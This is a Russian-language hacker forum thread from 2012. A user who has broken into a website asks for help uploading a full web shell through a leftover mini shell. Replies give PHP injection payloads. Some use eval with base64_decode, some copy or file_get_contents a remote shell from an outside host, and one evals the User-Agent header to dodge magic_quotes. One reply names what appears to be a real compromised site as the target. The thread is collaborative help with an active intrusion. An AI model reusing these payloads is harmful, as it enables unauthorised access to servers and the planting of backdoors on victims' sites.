ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Песочница (https://forum.antichat.io/forumdisplay.php?f=189)
-   -   Мини шелл (https://forum.antichat.io/showthread.php?t=329127)

Pirotexnik 17.04.2012 00:59

Доброго времени суток.

Залился на сайт. Через время допустил ошибку и шелл снесли.

Оставил на сайте мини шелл.

Захожу, все работает, довольный сижу такой, думаю щас зальюсь. А тут ***....

mshell.php?p1r0=phpinfo(); - GOOD

mshell.php?p1r0=copy('http://site./wso.txt','./wso.php'); - BAD

На сервере винда....

От чего может такое быть? Как решать? Спасибо.

ShellRoot 17.04.2012 01:05

http://base64.ru/

Кодируешь PHP код, затем юзаешь так:

mshell.php?p1r0=eval(base64_decode());

без '', и если спец символы на хвосте ("равно" например), то просто убирай их.

Думаю, должно сработать...

Pirotexnik 17.04.2012 01:16

Не помогло, но спасибо.

Konqi 17.04.2012 01:16

ShellRoot

base64_decode тоже принимает стринг, поэтому кaвычки обязательны

2 TC

copy($_GET[a],$_GET);&a=...&b=

или

file_put_contents($_GET[a],file_get_contents($_GET));&a=&b=

пригодится

http://php.su/functions/?stripslashes

ShellRoot 17.04.2012 01:20

Konqi, сколько раз без кавычек делал норм, достаточно стринг сделать так:

$a = (textstring);

но вот если используются спец.символы, такие как точки и т.п тогда уже надо, но мы специально заюзали без "равно", или иначе заюзать из глобальной переменной

Pashkela 17.04.2012 01:25

Цитата:

Сообщение от None
phpinfo();

вот для начала и кури, что там выводится. Например allow_url_fopen = off - и всё, забудь про шелл с другого сайта - онли только грузить с локали.

Хочешь грамотный ответ - давай инфу по ключевым позициям. Из того же phpinfo. Что такое "там" ключевые позиции - думай сам.

PS: Прежде чем страдать херней и юзать всяческие аплоадеры - для начала найди папку, в которую ты можешь вообще писать в принципе, и проверить её еще на предмет запретных правил предварительно (ошибки вообще-то тоже фиксируются). На то у тебя уже есть огромные возможности - выполняется phpinfo() - Значит в твоем распоряжении вся мощь языка ПИЭЙЧПИ.

Кстати, стыдно задавать такие вопросы, если phpinfo() выполняется. И никакие статьи это не реабилитируют.

У тебя уже есть выполнение php-кода. Вообще-то это равно иметь шелл. Думай

Pirotexnik 17.04.2012 01:51

Pashkela, стыдно задавать такие вопросы, но если их не задавать, то стыдится прийдется всегда!

Спасибо, вот щас сижу, думаю.

Цитата:

Сообщение от None
allow_url_fopen On
allow_url_include Off
disable_functions exec,passthru,shell_exec,system,proc_open,popen
file_uploads On
magic_quotes_gpc On

Странно то, что под бэйс64 кавычки выполняются на ура... Тоесть mq тут не причем.

UPD

________________________________________

Пробовал осздать файл, не помогло, не создается.... Идеи?

Cennarios 17.04.2012 03:10

Цитата:

Сообщение от Pirotexnik
Pashkela, стыдно задавать такие вопросы, но если их не задавать, то стыдится прийдется всегда!
Спасибо, вот щас сижу, думаю.
Странно то, что под бэйс64 кавычки выполняются на ура... Тоесть mq тут не причем.
UPD
________________________________________
Пробовал осздать файл, не помогло, не создается.... Идеи?

Еще как при чем. magic_quotes_gpc режет GPC массивы. Кавычки `бейсятся` и естественно пропускаются через magic_quotes попадая далее в последующую функцию.

Далее по делу:

http://site/?cmd=eval($_SERVER[HTTP_USER_AGENT]);

И модифицируй к виду HEADER: HTTP_USER_AGENT-> file_put_content('uploader.php','upload php code');

Это если php5 - если 4 пофантазируй. В пути также на директорию должны быть права.

Я не знаю какие у тебя ограничения в твоем случае. Мб поможет, в данном случае использование не GPC массива снимет слеширование через magic_quotes и прозволит использовать кавычки и указывать пути.

Pashkela 17.04.2012 03:21

http://www.datingfast.com/wp-atom.php?p1r0=eval(file_get_contents(base64_decode (тут_без_кавычек_адрес_твое о_шелла_например_http://site/shell.txt_только_в_base64)));

т.е. что-то типо этого:

http://www.datingfast.com/wp-atom.php?p1r0=eval(file_get_contents(base64_decode (aHR0cDovL3NpdGUvd3NvMl9ldmFsLnR4dA)));

НО, сначала почитай:

/thread191917.html

посмотри на дату и пусть тебе станет стыдно

PS: пох на права, шелл там льется за 2 секунды

Не проверял, но по моему легко зальется wso pack shell - т.е. упакованный (размер имеет значение )

Pirotexnik 17.04.2012 21:47

Никак не выходит... И не у меня одного, ещё пару человек пробовало. Далеко не новечки...


Время: 16:31